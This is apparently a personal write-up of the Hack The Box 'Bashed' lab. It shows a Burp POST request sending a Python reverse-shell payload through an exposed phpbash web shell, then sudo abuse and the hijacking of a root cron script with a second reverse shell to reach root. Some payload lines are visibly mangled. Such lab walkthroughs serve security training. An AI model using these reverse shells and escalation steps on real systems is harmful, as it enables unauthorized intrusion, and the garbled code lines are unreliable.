Next after Netmon is Bashed; I don’t know anything about it. I do wonder if it’s shellshock though, just based on the name.


HTTP only. Makes it easy, no?


On the webpage we get some information about something called phpbash, and there is a link to a Github repo where we can inspect the code. Essentially it takes POST requests and runs them as shell_exec. We need to find it on the website; a quick run with dirsearch turns up /dev and we can find what we’re after.

We can send it commands; I use Burp Repeater to get myself a reverse shell:

POST /dev/phpbash.php?cmd=id HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 252
Connection: close

cmd=cd /var/www/html/dev; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

On the box

I check sudo -l and find I can do whatever I want as scriptmanager; so I become scriptmanager.

connect to [] from (UNKNOWN) [] 40400
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bashed:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash  
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$ cd ~
cd ~
scriptmanager@bashed:~$ pwd

That’s all well and good, but I need to know what scriptmanager has access to. I search for files:

scriptmanager@bashed:/$ find . -user scriptmanager 2>/dev/null
find . -user scriptmanager 2>/dev/null
# etc, including about a million /proc

Right; what’s

scriptmanager@bashed:/scripts$ ls -lash
ls -lash
total 16K
4.0K drwxrwxr--  2 scriptmanager scriptmanager 4.0K Dec  4  2017 .
4.0K drwxr-xr-x 23 root          root          4.0K Dec  4  2017 ..
4.0K -rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017
4.0K -rw-r--r--  1 root          root            12 Mar  7 00:22 test.txt
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$ cat
f = open("test.txt", "w")
f.write("testing 123!")

Two interesting things to note here. One, we own the python script. Two, root owns the output and it was created very recently. I check /etc/crontab but there is nothing interesting. I wait a minute or two, and a new copy of test.txt is created. So it is running as a root cron. That’s our in:

scriptmanager@bashed:/scripts$ rm
scriptmanager@bashed:/scripts$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1235));os.dup2(s.fileno(),; os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);\n' >>
<no(),2);["/bin/sh","-i"]);\n' >>                  

We don’t have to wait long:

└─# nc -nvlp 1235                                                                                                                                                     1 
listening on [any] 1235 ...
connect to [] from (UNKNOWN) [] 36520
/bin/sh: 0: cant access tty; job control turned off
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -lash
total 32K
4.0K drwx------  3 root root 4.0K Dec  4  2017 .
4.0K drwxr-xr-x 23 root root 4.0K Dec  4  2017 ..
4.0K -rw-------  1 root root    1 Dec 23  2017 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  4  2017 .bashrc
4.0K drwxr-xr-x  2 root root 4.0K Dec  4  2017 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -r--------  1 root root   33 Dec  4  2017 root.txt
4.0K -rw-r--r--  1 root root   66 Dec  4  2017 .selected_editor
# cat root.txt
flag goes here

Pretty simple. Strictly speaking Traceback would be next but I’ve done that, so Nibbles it is.